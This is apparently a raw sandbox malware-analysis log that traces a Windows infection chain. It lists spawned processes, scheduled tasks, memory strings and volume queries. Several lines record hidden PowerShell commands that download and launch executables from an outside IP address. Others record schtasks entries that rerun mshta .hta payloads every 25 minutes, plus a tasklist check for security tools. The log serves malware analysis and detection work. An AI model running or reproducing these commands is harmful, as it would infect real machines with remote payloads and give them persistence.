Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "3d1I8ma3ZrJ" /tr "mshta \"C:\Temp\akcRBGtSi.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\akcRBGtSi.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE"
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "In6qPmaKHFs" /tr "mshta \"C:\Temp\sJKQarzEf.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\sJKQarzEf.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Process created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C5B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

2_2_6C5B4760

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C491C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

2_2_6C491C30

Source: a59b997485.exe, 0000000C.00000002.2243050792.0000000000BF2000.00000002.00000001.01000000.00000010.sdmp, a59b997485.exe, 0000002B.00000000.2393858838.0000000000BF2000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000002.2435802403.0000000000506000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000002.2432049951.0000000000506000.00000040.00000001.01000000.00000017.sdmp	Binary or memory string: o3fcjProgram Manager
Source: 4CAJNBDWED5ZLJ2B.exe, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2186782629.00000000007CB000.00000040.00000001.01000000.00000006.sdmp, ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe, 00000003.00000002.1957113414.0000000000F91000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 0000001B.00000002.2435802403.0000000000506000.00000040.00000001.01000000.00000017.sdmp, TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE, 00000022.00000002.2432049951.0000000000506000.00000040.00000001.01000000.00000017.sdmp	Binary or memory string: 3fcjProgram Manager

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C56AE71 cpuid

2_2_6C56AE71

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071541001\07ab034c92.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071541001\07ab034c92.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071542001\ede25bd9a2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071542001\ede25bd9a2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071543001\298e6cea90.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071543001\298e6cea90.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
